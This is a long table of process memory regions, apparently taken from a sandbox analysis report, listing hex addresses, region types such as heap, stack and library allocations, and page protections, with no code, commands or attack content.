1A578DD5000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page execute and read and write
|
||
3034000
|
trusted library allocation
|
page read and write
|
||
561A000
|
trusted library allocation
|
page read and write
|
||
63D0000
|
heap
|
page read and write
|
||
7FFB23B22000
|
unkown
|
page readonly
|
||
2AC5AA6B000
|
heap
|
page read and write
|
||
2AC58B11000
|
heap
|
page read and write
|
||
1A57AABF000
|
heap
|
page read and write
|
||
2AC5D0E6000
|
heap
|
page read and write
|
||
411F000
|
trusted library allocation
|
page read and write
|
||
7770000
|
trusted library allocation
|
page read and write
|
||
531B000
|
trusted library allocation
|
page read and write
|
||
4E41000
|
trusted library allocation
|
page read and write
|
||
5309000
|
trusted library allocation
|
page read and write
|
||
2AC58B84000
|
heap
|
page read and write
|
||
7031000
|
heap
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
4DCA000
|
trusted library allocation
|
page read and write
|
||
7569000
|
trusted library allocation
|
page read and write
|
||
50FE000
|
trusted library allocation
|
page read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
436C000
|
stack
|
page read and write
|
||
1A57AB23000
|
heap
|
page read and write
|
||
812000
|
heap
|
page read and write
|
||
586C9FE000
|
stack
|
page read and write
|
||
9C88000
|
trusted library allocation
|
page read and write
|
||
1A57C6F0000
|
heap
|
page read and write
|
||
5651000
|
trusted library allocation
|
page read and write
|
||
1A57C6A0000
|
heap
|
page read and write
|
||
2AC5AA68000
|
heap
|
page read and write
|
||
2AC5AB4C000
|
heap
|
page read and write
|
||
4E92000
|
trusted library allocation
|
page read and write
|
||
B3D3AFD000
|
stack
|
page read and write
|
||
1A57D0AB000
|
heap
|
page read and write
|
||
1A57D125000
|
heap
|
page read and write
|
||
33D2000
|
trusted library allocation
|
page read and write
|
||
A132000
|
heap
|
page read and write
|
||
53E8000
|
trusted library allocation
|
page read and write
|
||
2AC58B53000
|
heap
|
page read and write
|
||
AA11000
|
trusted library allocation
|
page read and write
|
||
1010000
|
heap
|
page read and write
|
||
4D60000
|
trusted library allocation
|
page read and write
|
||
5536000
|
trusted library allocation
|
page read and write
|
||
7371000
|
heap
|
page read and write
|
||
2AC58B2A000
|
heap
|
page read and write
|
||
56D0000
|
trusted library allocation
|
page execute and read and write
|
||
4EB8000
|
trusted library allocation
|
page read and write
|
||
9A88000
|
trusted library allocation
|
page read and write
|
||
5510000
|
trusted library allocation
|
page read and write
|
||
6B6B000
|
stack
|
page read and write
|
||
1A57AC2C000
|
heap
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
4F3A000
|
trusted library allocation
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
B3D3BFE000
|
stack
|
page read and write
|
||
6780000
|
heap
|
page read and write
|
||
53A1000
|
trusted library allocation
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
47CF000
|
stack
|
page read and write
|
||
8E41000
|
trusted library allocation
|
page read and write
|
||
1540000
|
trusted library allocation
|
page execute and read and write
|
||
9AA0000
|
heap
|
page read and write
|
||
54D4000
|
trusted library allocation
|
page read and write
|
||
696000
|
trusted library allocation
|
page execute and read and write
|
||
B3D38FF000
|
stack
|
page read and write
|
||
82E0000
|
trusted library allocation
|
page read and write
|
||
1A57D055000
|
heap
|
page read and write
|
||
1A57D0F0000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
377B000
|
trusted library allocation
|
page read and write
|
||
4FFF000
|
trusted library allocation
|
page read and write
|
||
6C0000
|
trusted library allocation
|
page read and write
|
||
434000
|
unkown
|
page readonly
|
||
53EC000
|
trusted library allocation
|
page read and write
|
||
1A57AAF7000
|
heap
|
page read and write
|
||
87F0000
|
heap
|
page execute and read and write
|
||
2AC5AA5F000
|
heap
|
page read and write
|
||
5364000
|
trusted library allocation
|
page read and write
|
||
A60000
|
trusted library allocation
|
page read and write
|
||
54BD000
|
trusted library allocation
|
page read and write
|
||
7D9F000
|
stack
|
page read and write
|
||
583C000
|
stack
|
page read and write
|
||
58A9000
|
trusted library allocation
|
page read and write
|
||
7E10000
|
trusted library allocation
|
page read and write
|
||
4F3D000
|
trusted library allocation
|
page read and write
|
||
2AC5D07B000
|
heap
|
page read and write
|
||
1A57D0F3000
|
heap
|
page read and write
|
||
37D7000
|
trusted library allocation
|
page read and write
|
||
2AC5CFD7000
|
heap
|
page read and write
|
||
4F29000
|
trusted library allocation
|
page read and write
|
||
2AC5AB70000
|
heap
|
page read and write
|
||
508D000
|
stack
|
page read and write
|
||
2A70000
|
trusted library allocation
|
page read and write
|
||
2AC5D093000
|
heap
|
page read and write
|
||
2AC5ABB0000
|
heap
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
1567000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2F00000
|
trusted library allocation
|
page read and write
|
||
7B81000
|
trusted library allocation
|
page read and write
|
||
1510000
|
trusted library allocation
|
page read and write
|
||
551D000
|
trusted library allocation
|
page read and write
|
||
7FFB1C300000
|
unkown
|
page read and write
|
||
3496000
|
trusted library allocation
|
page read and write
|
||
2C8E000
|
heap
|
page read and write
|
||
4170000
|
trusted library allocation
|
page read and write
|
||
2AC9000
|
heap
|
page read and write
|
||
4E3E000
|
stack
|
page read and write
|
||
2AC5C57F000
|
heap
|
page read and write
|
||
1A57CC3A000
|
heap
|
page read and write
|
||
1A57C652000
|
heap
|
page read and write
|
||
5068000
|
trusted library allocation
|
page read and write
|
||
2AC5AA57000
|
heap
|
page read and write
|
||
54EB000
|
trusted library allocation
|
page read and write
|
||
2AC5C847000
|
heap
|
page read and write
|
||
5AE6000
|
heap
|
page read and write
|
||
36BE000
|
trusted library allocation
|
page read and write
|
||
8350000
|
heap
|
page read and write
|
||
52A1000
|
trusted library allocation
|
page read and write
|
||
6890000
|
trusted library allocation
|
page execute and read and write
|
||
4F24000
|
trusted library allocation
|
page read and write
|
||
4DB3000
|
trusted library allocation
|
page read and write
|
||
7090000
|
heap
|
page read and write
|
||
7FB8000
|
trusted library allocation
|
page read and write
|
||
5BAB000
|
heap
|
page read and write
|
||
509C000
|
trusted library allocation
|
page read and write
|
||
2AC5C51D000
|
heap
|
page read and write
|
||
50EE000
|
trusted library allocation
|
page read and write
|
||
5AD0000
|
heap
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
4F8C000
|
stack
|
page read and write
|
||
6260000
|
trusted library allocation
|
page execute and read and write
|
||
54F3000
|
trusted library allocation
|
page read and write
|
||
5386000
|
trusted library allocation
|
page read and write
|
||
760E000
|
stack
|
page read and write
|
||
6EBB000
|
stack
|
page read and write
|
||
29BF000
|
stack
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
5044000
|
trusted library allocation
|
page read and write
|
||
2AC5CA6E000
|
heap
|
page read and write
|
||
53DD000
|
trusted library allocation
|
page read and write
|
||
2AC5AA8B000
|
heap
|
page read and write
|
||
1A57C4E0000
|
heap
|
page read and write
|
||
50DF000
|
trusted library allocation
|
page read and write
|
||
1A57AAD8000
|
heap
|
page read and write
|
||
2AC5AA83000
|
heap
|
page read and write
|
||
1A57ABA1000
|
heap
|
page read and write
|
||
5411000
|
trusted library allocation
|
page read and write
|
||
650000
|
trusted library allocation
|
page read and write
|
||
52FA000
|
trusted library allocation
|
page read and write
|
||
50AB000
|
trusted library allocation
|
page read and write
|
||
2AC58A90000
|
heap
|
page read and write
|
||
4D7D000
|
trusted library allocation
|
page read and write
|
||
1506000
|
trusted library allocation
|
page execute and read and write
|
||
50AF000
|
trusted library allocation
|
page read and write
|
||
4FD0000
|
heap
|
page read and write
|
||
2AC5AA37000
|
heap
|
page read and write
|
||
54EF000
|
trusted library allocation
|
page read and write
|
||
2A8E000
|
trusted library allocation
|
page read and write
|
||
3712000
|
trusted library allocation
|
page read and write
|
||
5840000
|
heap
|
page read and write
|
||
55F0000
|
trusted library allocation
|
page read and write
|
||
5630000
|
trusted library allocation
|
page read and write
|
||
7FFB1C2E0000
|
unkown
|
page readonly
|
||
1A57C6DE000
|
heap
|
page read and write
|
||
4D83000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2A82000
|
trusted library allocation
|
page read and write
|
||
702D000
|
heap
|
page read and write
|
||
56B0000
|
trusted library allocation
|
page read and write
|
||
43D0000
|
heap
|
page read and write
|
||
227FF8B4000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5D019000
|
heap
|
page read and write
|
||
52A9000
|
trusted library allocation
|
page read and write
|
||
5529000
|
trusted library allocation
|
page read and write
|
||
5345000
|
trusted library allocation
|
page read and write
|
||
227FF8A0000
|
heap
|
page read and write
|
||
506A000
|
trusted library allocation
|
page read and write
|
||
54BB000
|
trusted library allocation
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
2340000
|
trusted library allocation
|
page execute and read and write
|
||
4EAC000
|
trusted library allocation
|
page read and write
|
||
1A57AC08000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
50F0000
|
trusted library allocation
|
page read and write
|
||
F16C5FE000
|
stack
|
page read and write
|
||
52D0000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
2AC5D052000
|
heap
|
page read and write
|
||
2AC5AAE7000
|
heap
|
page read and write
|
||
66B9000
|
trusted library allocation
|
page read and write
|
||
10F0000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
8390000
|
trusted library allocation
|
page read and write
|
||
65CD000
|
stack
|
page read and write
|
||
4EB6000
|
trusted library allocation
|
page read and write
|
||
2E4E000
|
stack
|
page read and write
|
||
1A578DFE000
|
heap
|
page read and write
|
||
2AC5CA6E000
|
heap
|
page read and write
|
||
4F12000
|
trusted library allocation
|
page read and write
|
||
7290000
|
trusted library allocation
|
page read and write
|
||
4EBA000
|
trusted library allocation
|
page read and write
|
||
2AC5AA4B000
|
heap
|
page read and write
|
||
5909000
|
trusted library allocation
|
page read and write
|
||
7341000
|
heap
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
1A57D0EA000
|
heap
|
page read and write
|
||
4DE5000
|
trusted library allocation
|
page read and write
|
||
50CE000
|
trusted library allocation
|
page read and write
|
||
5A70000
|
heap
|
page read and write
|
||
1A578DDE000
|
heap
|
page read and write
|
||
271A000
|
trusted library allocation
|
page read and write
|
||
561C000
|
trusted library allocation
|
page read and write
|
||
676D000
|
stack
|
page read and write
|
||
505B000
|
trusted library allocation
|
page read and write
|
||
554F000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57D10C000
|
heap
|
page read and write
|
||
53FB000
|
trusted library allocation
|
page read and write
|
||
2810000
|
heap
|
page read and write
|
||
47E0000
|
trusted library allocation
|
page read and write
|
||
6E7B000
|
stack
|
page read and write
|
||
2A54000
|
trusted library allocation
|
page read and write
|
||
2AC5CB47000
|
heap
|
page read and write
|
||
58A1000
|
trusted library allocation
|
page read and write
|
||
54DD000
|
trusted library allocation
|
page read and write
|
||
35FE000
|
trusted library allocation
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
2AC5CC37000
|
heap
|
page read and write
|
||
2F1D000
|
trusted library allocation
|
page execute and read and write
|
||
1A57AAF3000
|
heap
|
page read and write
|
||
6660000
|
heap
|
page read and write
|
||
4E0D000
|
trusted library allocation
|
page read and write
|
||
2AC5D051000
|
heap
|
page read and write
|
||
1A57AB04000
|
heap
|
page read and write
|
||
5581000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2AC5D07B000
|
heap
|
page read and write
|
||
60B0000
|
trusted library allocation
|
page execute and read and write
|
||
2C09000
|
heap
|
page read and write
|
||
36D8000
|
trusted library allocation
|
page read and write
|
||
7FFB1C305000
|
unkown
|
page readonly
|
||
5525000
|
trusted library allocation
|
page read and write
|
||
F16C2FF000
|
stack
|
page read and write
|
||
2AC5AA89000
|
heap
|
page read and write
|
||
1A57D123000
|
heap
|
page read and write
|
||
6EE0000
|
trusted library allocation
|
page read and write
|
||
2AC5AA63000
|
heap
|
page read and write
|
||
5A0F000
|
stack
|
page read and write
|
||
31E6000
|
trusted library allocation
|
page read and write
|
||
2AC5D01F000
|
heap
|
page read and write
|
||
1A578C00000
|
heap
|
page read and write
|
||
6ED0000
|
trusted library allocation
|
page execute and read and write
|
||
1A57C8E0000
|
heap
|
page read and write
|
||
538A000
|
trusted library allocation
|
page read and write
|
||
34DC000
|
trusted library allocation
|
page read and write
|
||
1A578C20000
|
heap
|
page read and write
|
||
645B000
|
stack
|
page read and write
|
||
558C000
|
trusted library allocation
|
page read and write
|
||
2AC5D029000
|
heap
|
page read and write
|
||
F16C8FD000
|
stack
|
page read and write
|
||
50E9000
|
trusted library allocation
|
page read and write
|
||
1A57D0AB000
|
heap
|
page read and write
|
||
4EF0000
|
trusted library allocation
|
page read and write
|
||
6220000
|
trusted library allocation
|
page execute and read and write
|
||
31DB000
|
trusted library allocation
|
page read and write
|
||
251E000
|
stack
|
page read and write
|
||
54CA000
|
trusted library allocation
|
page read and write
|
||
563F000
|
trusted library allocation
|
page read and write
|
||
733C000
|
stack
|
page read and write
|
||
4F3F000
|
trusted library allocation
|
page read and write
|
||
4EEE000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
2AC5AA31000
|
heap
|
page read and write
|
||
1A57D104000
|
heap
|
page read and write
|
||
6680000
|
trusted library allocation
|
page execute and read and write
|
||
5375000
|
trusted library allocation
|
page read and write
|
||
4047000
|
trusted library allocation
|
page read and write
|
||
77E0000
|
trusted library allocation
|
page read and write
|
||
655E000
|
stack
|
page read and write
|
||
50E7000
|
trusted library allocation
|
page read and write
|
||
1A57AAFB000
|
heap
|
page read and write
|
||
482C000
|
stack
|
page read and write
|
||
31CF000
|
trusted library allocation
|
page read and write
|
||
7280000
|
trusted library allocation
|
page read and write
|
||
A040000
|
trusted library section
|
page read and write
|
||
1A57D0D6000
|
heap
|
page read and write
|
||
5100000
|
trusted library allocation
|
page read and write
|
||
4D98000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
81B6000
|
stack
|
page read and write
|
||
2AC5ABB0000
|
heap
|
page read and write
|
||
586C8FF000
|
stack
|
page read and write
|
||
2AC5C470000
|
heap
|
page read and write
|
||
1A578D53000
|
heap
|
page read and write
|
||
5117000
|
trusted library allocation
|
page read and write
|
||
4C00000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
584F000
|
stack
|
page read and write
|
||
1A578D51000
|
heap
|
page read and write
|
||
7FFB23B16000
|
unkown
|
page readonly
|
||
73D1D000
|
unkown
|
page read and write
|
||
4D2E000
|
stack
|
page read and write
|
||
8708000
|
trusted library allocation
|
page read and write
|
||
B3D3DFB000
|
stack
|
page read and write
|
||
1515000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5AAB3000
|
heap
|
page read and write
|
||
2AC5C7DD000
|
heap
|
page read and write
|
||
5569000
|
trusted library allocation
|
page read and write
|
||
8820000
|
trusted library allocation
|
page read and write
|
||
227FF8E9000
|
heap
|
page read and write
|
||
52DF000
|
trusted library allocation
|
page read and write
|
||
227FF876000
|
heap
|
page read and write
|
||
2AC5C61C000
|
heap
|
page read and write
|
||
2C90000
|
heap
|
page read and write
|
||
2772000
|
heap
|
page read and write
|
||
1A578DFE000
|
heap
|
page read and write
|
||
3D0000
|
unkown
|
page readonly
|
||
8240000
|
trusted library allocation
|
page execute and read and write
|
||
40D6000
|
trusted library allocation
|
page read and write
|
||
2AC58B3B000
|
heap
|
page read and write
|
||
8325000
|
trusted library allocation
|
page read and write
|
||
3729000
|
trusted library allocation
|
page read and write
|
||
55F8000
|
trusted library allocation
|
page read and write
|
||
63E0000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
3E1000
|
unkown
|
page read and write
|
||
2AC5AA68000
|
heap
|
page read and write
|
||
5636000
|
trusted library allocation
|
page read and write
|
||
2AC58D8A000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
2AC5AC2E000
|
heap
|
page read and write
|
||
2AC5AA4F000
|
heap
|
page read and write
|
||
55FA000
|
trusted library allocation
|
page read and write
|
||
5A80000
|
heap
|
page read and write
|
||
9E81000
|
trusted library allocation
|
page read and write
|
||
54D0000
|
heap
|
page execute and read and write
|
||
53C3000
|
trusted library allocation
|
page read and write
|
||
1A57CE92000
|
heap
|
page read and write
|
||
5332000
|
trusted library allocation
|
page read and write
|
||
8270000
|
trusted library allocation
|
page execute and read and write
|
||
6240000
|
trusted library allocation
|
page read and write
|
||
670000
|
trusted library allocation
|
page read and write
|
||
7CC6000
|
stack
|
page read and write
|
||
4B5E000
|
stack
|
page read and write
|
||
486E000
|
stack
|
page read and write
|
||
4D81000
|
trusted library allocation
|
page read and write
|
||
550F000
|
trusted library allocation
|
page read and write
|
||
2AC5C51D000
|
heap
|
page read and write
|
||
2F64000
|
trusted library allocation
|
page read and write
|
||
2F13000
|
trusted library allocation
|
page execute and read and write
|
||
4DE3000
|
trusted library allocation
|
page read and write
|
||
2AC5D0E2000
|
heap
|
page read and write
|
||
5139000
|
trusted library allocation
|
page read and write
|
||
23B0000
|
trusted library allocation
|
page read and write
|
||
71BE000
|
stack
|
page read and write
|
||
2AC58AA0000
|
heap
|
page read and write
|
||
4C7D000
|
stack
|
page read and write
|
||
50B5000
|
trusted library allocation
|
page read and write
|
||
1A57AADB000
|
heap
|
page read and write
|
||
266C000
|
stack
|
page read and write
|
||
2AC5CA6E000
|
heap
|
page read and write
|
||
50E1000
|
trusted library allocation
|
page read and write
|
||
4990000
|
trusted library allocation
|
page read and write
|
||
7370000
|
heap
|
page read and write
|
||
2AC5AA31000
|
heap
|
page read and write
|
||
1A57CB3B000
|
heap
|
page read and write
|
||
9A8A000
|
heap
|
page read and write
|
||
55AB000
|
trusted library allocation
|
page read and write
|
||
1A578D85000
|
heap
|
page read and write
|
||
4E77000
|
trusted library allocation
|
page read and write
|
||
536E000
|
stack
|
page read and write
|
||
29FD000
|
stack
|
page read and write
|
||
2AC5C770000
|
heap
|
page read and write
|
||
3D1000
|
unkown
|
page execute read
|
||
1A57AAAF000
|
heap
|
page read and write
|
||
3E2000
|
unkown
|
page readonly
|
||
4DBB000
|
trusted library allocation
|
page read and write
|
||
5153000
|
trusted library allocation
|
page read and write
|
||
2AC58B61000
|
heap
|
page read and write
|
||
5347000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
2355000
|
trusted library allocation
|
page read and write
|
||
50B1000
|
trusted library allocation
|
page read and write
|
||
1A57CA3F000
|
heap
|
page read and write
|
||
7330000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
1A57C4FD000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
55CA000
|
trusted library allocation
|
page read and write
|
||
8BBF000
|
trusted library allocation
|
page read and write
|
||
8990000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5AA39000
|
heap
|
page read and write
|
||
4E3D000
|
trusted library allocation
|
page read and write
|
||
7220000
|
trusted library allocation
|
page read and write
|
||
2AC5CE1C000
|
heap
|
page read and write
|
||
1560000
|
heap
|
page read and write
|
||
9A90000
|
trusted library allocation
|
page read and write
|
||
7571000
|
trusted library allocation
|
page read and write
|
||
77A0000
|
trusted library allocation
|
page read and write
|
||
2AC58D8B000
|
heap
|
page read and write
|
||
1A57B1FE000
|
heap
|
page read and write
|
||
52FC000
|
trusted library allocation
|
page read and write
|
||
50CC000
|
trusted library allocation
|
page read and write
|
||
3723000
|
trusted library allocation
|
page read and write
|
||
35E6000
|
trusted library allocation
|
page read and write
|
||
2FAA000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
3715000
|
trusted library allocation
|
page read and write
|
||
8960000
|
trusted library allocation
|
page read and write
|
||
DA7000
|
stack
|
page read and write
|
||
586CCFB000
|
stack
|
page read and write
|
||
2A5D000
|
trusted library allocation
|
page execute and read and write
|
||
603E000
|
stack
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
2AC58B51000
|
heap
|
page read and write
|
||
47D0000
|
trusted library allocation
|
page read and write
|
||
5128000
|
trusted library allocation
|
page read and write
|
||
2AC58D89000
|
heap
|
page read and write
|
||
2F3A000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5AA93000
|
heap
|
page read and write
|
||
7247000
|
trusted library allocation
|
page read and write
|
||
4F43000
|
trusted library allocation
|
page read and write
|
||
2AC5D082000
|
heap
|
page read and write
|
||
2A53000
|
trusted library allocation
|
page execute and read and write
|
||
516E000
|
trusted library allocation
|
page read and write
|
||
1A578CAC000
|
heap
|
page read and write
|
||
94E000
|
stack
|
page read and write
|
||
5588000
|
trusted library allocation
|
page read and write
|
||
52E3000
|
trusted library allocation
|
page read and write
|
||
5433000
|
trusted library allocation
|
page read and write
|
||
4F05000
|
trusted library allocation
|
page read and write
|
||
A104000
|
heap
|
page read and write
|
||
2AC5CFE2000
|
heap
|
page read and write
|
||
43D7000
|
heap
|
page read and write
|
||
54A4000
|
trusted library allocation
|
page read and write
|
||
71FD000
|
stack
|
page read and write
|
||
139F000
|
stack
|
page read and write
|
||
4E7B000
|
trusted library allocation
|
page read and write
|
||
1A57CE38000
|
heap
|
page read and write
|
||
557F000
|
trusted library allocation
|
page read and write
|
||
1211000
|
heap
|
page read and write
|
||
2AC5CBC6000
|
heap
|
page read and write
|
||
5DAE000
|
stack
|
page read and write
|
||
1A57AAB9000
|
heap
|
page read and write
|
||
5289000
|
trusted library allocation
|
page read and write
|
||
2CCA000
|
heap
|
page read and write
|
||
665E000
|
stack
|
page read and write
|
||
9C8A000
|
trusted library allocation
|
page read and write
|
||
1A57C68D000
|
heap
|
page read and write
|
||
5FFE000
|
stack
|
page read and write
|
||
50B3000
|
trusted library allocation
|
page read and write
|
||
4E73000
|
trusted library allocation
|
page read and write
|
||
A100000
|
trusted library allocation
|
page execute and read and write
|
||
717E000
|
stack
|
page read and write
|
||
2C2F000
|
heap
|
page read and write
|
||
4F22000
|
trusted library allocation
|
page read and write
|
||
3149000
|
trusted library allocation
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
1A57AB67000
|
heap
|
page read and write
|
||
562E000
|
stack
|
page read and write
|
||
6280000
|
trusted library allocation
|
page read and write
|
||
5627000
|
trusted library allocation
|
page read and write
|
||
674000
|
trusted library allocation
|
page read and write
|
||
5294000
|
trusted library allocation
|
page read and write
|
||
66E0000
|
trusted library allocation
|
page read and write
|
||
1A57AAD3000
|
heap
|
page read and write
|
||
3637000
|
trusted library allocation
|
page read and write
|
||
513A000
|
stack
|
page read and write
|
||
53B6000
|
trusted library allocation
|
page read and write
|
||
5B44000
|
trusted library allocation
|
page read and write
|
||
48A0000
|
heap
|
page read and write
|
||
1A57C60E000
|
heap
|
page read and write
|
||
4F70000
|
heap
|
page read and write
|
||
55E1000
|
trusted library allocation
|
page read and write
|
||
588C000
|
stack
|
page read and write
|
||
2A21000
|
trusted library allocation
|
page read and write
|
||
4EF2000
|
trusted library allocation
|
page read and write
|
||
227FFAC5000
|
heap
|
page read and write
|
||
1A57AAD8000
|
heap
|
page read and write
|
||
2AC5AA9B000
|
heap
|
page read and write
|
||
2AC5AA68000
|
heap
|
page read and write
|
||
56A0000
|
trusted library allocation
|
page execute and read and write
|
||
2AC58D8B000
|
heap
|
page read and write
|
||
5287000
|
trusted library allocation
|
page read and write
|
||
371E000
|
trusted library allocation
|
page read and write
|
||
2AC5CFF2000
|
heap
|
page read and write
|
||
2947000
|
stack
|
page read and write
|
||
2A40000
|
trusted library allocation
|
page read and write
|
||
57B0000
|
trusted library allocation
|
page read and write
|
||
2F90000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5D082000
|
heap
|
page read and write
|
||
22781780000
|
heap
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
561E000
|
trusted library allocation
|
page read and write
|
||
2F32000
|
trusted library allocation
|
page read and write
|
||
52B1000
|
trusted library allocation
|
page read and write
|
||
1A57AAA0000
|
heap
|
page read and write
|
||
6A7000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5AA40000
|
heap
|
page read and write
|
||
5156000
|
trusted library allocation
|
page read and write
|
||
2AC5D01F000
|
heap
|
page read and write
|
||
6A2E000
|
stack
|
page read and write
|
||
516C000
|
trusted library allocation
|
page read and write
|
||
5A4E000
|
trusted library allocation
|
page read and write
|
||
839E000
|
trusted library allocation
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
48FE000
|
trusted library allocation
|
page read and write
|
||
4189000
|
trusted library allocation
|
page read and write
|
||
53C0000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
7FFB23B20000
|
unkown
|
page read and write
|
||
1A578D87000
|
heap
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
1A57AAC3000
|
heap
|
page read and write
|
||
4CBE000
|
stack
|
page read and write
|
||
5624000
|
trusted library allocation
|
page read and write
|
||
2AC5AB31000
|
heap
|
page read and write
|
||
1A57C9DE000
|
heap
|
page read and write
|
||
4E49000
|
trusted library allocation
|
page read and write
|
||
2270000
|
trusted library allocation
|
page read and write
|
||
2AC5BD86000
|
heap
|
page read and write
|
||
4E7E000
|
stack
|
page read and write
|
||
2320000
|
heap
|
page execute and read and write
|
||
227FF887000
|
heap
|
page read and write
|
||
6F60000
|
trusted library allocation
|
page read and write
|
||
2AC5D07B000
|
heap
|
page read and write
|
||
2AC5CFE6000
|
heap
|
page read and write
|
||
1A57BDF6000
|
heap
|
page read and write
|
||
354D000
|
trusted library allocation
|
page read and write
|
||
F16CBFE000
|
stack
|
page read and write
|
||
2AC58BAA000
|
heap
|
page read and write
|
||
1A57AACB000
|
heap
|
page read and write
|
||
53A3000
|
trusted library allocation
|
page read and write
|
||
73EE000
|
heap
|
page read and write
|
||
115D000
|
stack
|
page read and write
|
||
1A57AC9E000
|
heap
|
page read and write
|
||
540F000
|
trusted library allocation
|
page read and write
|
||
227FF8B4000
|
heap
|
page read and write
|
||
1A57C6DE000
|
heap
|
page read and write
|
||
1A578D00000
|
heap
|
page read and write
|
||
1A57AABB000
|
heap
|
page read and write
|
||
7F5F000
|
stack
|
page read and write
|
||
2AC5AB97000
|
heap
|
page read and write
|
||
2F14000
|
trusted library allocation
|
page read and write
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
4D94000
|
trusted library allocation
|
page read and write
|
||
3746000
|
trusted library allocation
|
page read and write
|
||
343C000
|
trusted library allocation
|
page read and write
|
||
56F0000
|
trusted library allocation
|
page read and write
|
||
1550000
|
trusted library allocation
|
page read and write
|
||
2AC5C51E000
|
heap
|
page read and write
|
||
4F63000
|
trusted library allocation
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
4DC6000
|
trusted library allocation
|
page read and write
|
||
5666000
|
trusted library allocation
|
page read and write
|
||
529A000
|
trusted library allocation
|
page read and write
|
||
1A57ABA7000
|
heap
|
page read and write
|
||
54AE000
|
stack
|
page read and write
|
||
72AE000
|
stack
|
page read and write
|
||
7FFB23B00000
|
unkown
|
page readonly
|
||
5586000
|
trusted library allocation
|
page read and write
|
||
5630000
|
trusted library allocation
|
page read and write
|
||
5206000
|
trusted library allocation
|
page read and write
|
||
1A578D55000
|
heap
|
page read and write
|
||
2AC58B2F000
|
heap
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
5115000
|
trusted library allocation
|
page read and write
|
||
2AC5AA33000
|
heap
|
page read and write
|
||
1A57C8CC000
|
heap
|
page read and write
|
||
2AC58BAA000
|
heap
|
page read and write
|
||
1A57CADD000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
379F000
|
trusted library allocation
|
page read and write
|
||
2AC5AB2E000
|
heap
|
page read and write
|
||
5366000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
4E9C000
|
trusted library allocation
|
page read and write
|
||
3521000
|
trusted library allocation
|
page read and write
|
||
5C20000
|
heap
|
page read and write
|
||
4E13000
|
trusted library allocation
|
page read and write
|
||
1A57AB9E000
|
heap
|
page read and write
|
||
7361000
|
heap
|
page read and write
|
||
8260000
|
heap
|
page read and write
|
||
1A578D4E000
|
heap
|
page read and write
|
||
227FF87A000
|
heap
|
page read and write
|
||
6F70000
|
heap
|
page read and write
|
||
8230000
|
trusted library allocation
|
page read and write
|
||
2AC5AABF000
|
heap
|
page read and write
|
||
53D7000
|
trusted library allocation
|
page read and write
|
||
4DD2000
|
trusted library allocation
|
page read and write
|
||
722E000
|
stack
|
page read and write
|
||
2AC58BFE000
|
heap
|
page read and write
|
||
5508000
|
trusted library allocation
|
page read and write
|
||
37C6000
|
trusted library allocation
|
page read and write
|
||
503E000
|
trusted library allocation
|
page read and write
|
||
9CE0000
|
trusted library allocation
|
page execute and read and write
|
||
2AC5CDD8000
|
heap
|
page read and write
|
||
53BC000
|
trusted library allocation
|
page read and write
|
||
1A57CACD000
|
heap
|
page read and write
|
||
54D8000
|
trusted library allocation
|
page read and write
|
||
31BA000
|
trusted library allocation
|
page read and write
|
||
5ACA000
|
trusted library allocation
|
page read and write
|
||
4E62000
|
trusted library allocation
|
page read and write
|
||
2AC5D054000
|
heap
|
page read and write
|
||
5A90000
|
heap
|
page read and write
|
||
4970000
|
trusted library allocation
|
